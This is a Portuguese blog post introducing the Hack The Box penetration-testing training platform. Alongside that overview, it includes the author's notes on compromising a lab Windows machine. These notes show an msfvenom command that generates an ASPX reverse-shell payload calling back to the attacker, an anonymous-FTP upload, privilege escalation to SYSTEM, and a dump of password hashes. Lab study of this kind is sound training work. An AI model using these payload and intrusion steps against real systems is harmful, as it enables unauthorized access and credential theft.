Hack The Box: teste suas habilidades em segurança ofensiva (testes de invasão)

Você conhece o ambiente de treinamento para pentesters chamado Hack The Box?

Esse site é uma plataforma gratuita (também tem a versão paga) para testar suas habilidades em segurança ofensiva, ou seja, testes de invasão. Existem dezenas de máquinas com vulnerabilidades nesse ambiente, tanto Windows como Linux, todo o acesso é feito via VPN que é disponibilizada pelo site após um cadastro.

hack-the-box_001

O primeiro desafio do Hack The Box é conseguir o invite para se cadastrar. O próprio site avisa que se você não conseguir fazer isso, nem adianta entrar no site pois não vai conseguir comprometer os servidores disponíveis no ambiente.

hack-the-box_002

No Painel principal do site vemos um panorama dos usuários que estão online e o ranking dos melhores colocados em pontuação.

hack-the-box_003

Na parte superior é onde ficam as instruções de como você deve se conectar usando o arquivo de VPN que o site disponibiliza e depois as máquinas vulneráveis que estão ativas no momento no laboratório deles. Esse site é ótimo para quem quer testar suas habilidades de invasão e também para aqueles que querem estudar vários ambientes diferentes antes de tentar o exame da Offensive Security, embora a empresa do Kali Linux também tenha seu laboratório particular para treinamento antes da prova.

hack-the-box_005

Na imagem acima, vemos algumas das máquinas que são disponibilizadas pelo Hack The Box, com seu IP (Range 10.10.10.0/24) e seu nível de dificuldade para comprometer o sistema. A invasão deve ser feita em dois passos: primeiro acessar o sistema como usuário comum, achar e ler o conteúdo do arquivo user.txt e depois escalar privilégios de administrador e ler o conteúdo do arquivo root.txt, tanto para ambiente Windows como para ambiente Linux.

hack-the-box_006

Na imagem acima estão alguns estudos que fiz quando estava com mais tempo para poder treinar no ambiente Hack The Box e abaixo estão os arquivos que havia falado anteriormente que é preciso capturar para validar que a invasão do servidor teve sucesso.

hack-the-box_009

É sempre bom ir documentando tudo, principalmente o que foi feito para invadir o sistema. Como são muitos servidores, com o tempo você nem vai lembrar mais como invadiu tal servidor.

host        port  proto  name  state  info
----        ----  -----  ----  -----  ----
10.10.10.5  21    tcp          open   
10.10.10.5  80    tcp          open

address     mac  name   os_name    os_flavor  os_sp  purpose  info  comments
-------     ---  ----   -------    ---------  -----  -------  ----  --------
10.10.10.5       DEVEL  Windows 7                    client 

meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter > getuid 
Server username: IIS APPPOOL\Web

shell: evil.aspx
10.10.10.5/evil.aspx
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LPORT=4444 LHOST=10.10.14.158 -f aspx -o evil.aspx

Escalação de privilégios:
Não foi preciso alterar permissões em pastas, fiz a migração do processo do meterpreter para outro processo e consegui acesso
de usuário de sistema:
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

Os arquivos estavam no Desktop dos usuários:
babis 9ecdd6a3aedf24b41562fea70f4cb3e8
Administrator e621a0b5041708797c4fc4728bc72b4b 

meterpreter > hashdump 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a450f6000be7df50ee304d0a838d638f:::
babis:1000:aad3b435b51404eeaad3b435b51404ee:a1133ec0f7779e215acc8a36922acf57:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Vulnerabilidade:
FTP Aberto com usuário anonymous, fiz a inclusão "PUT" do arquivo evil.aspx para 
abrir um backdoor na aplicação.

Abaixo está como a conexão ao ambiente é feita. Após o download do arquivo da VPN, basta chamar o mesmo com o comando “openvpn”.

hack-the-box_007

hack-the-box_008

hack-the-box_010

Interface “tun0” ativada, agora já é possível pingar e acessar todos os servidores da rede do Hack The Box.

Recomendo fortemente o uso desse ambiente para treinamento, principalmente pela presença de servidores Windows. Muitos estudantes de segurança e hacking gostam de fazer invasões em ambiente Linux mas esquecem que boa parte do mundo corporativo usa massivamente Windows para Active Directory, WSUS, Radius e tantos outros serviços e executar uma invasão em um servidor Windows muitas vezes é bem mais complicado que um servidor Linux.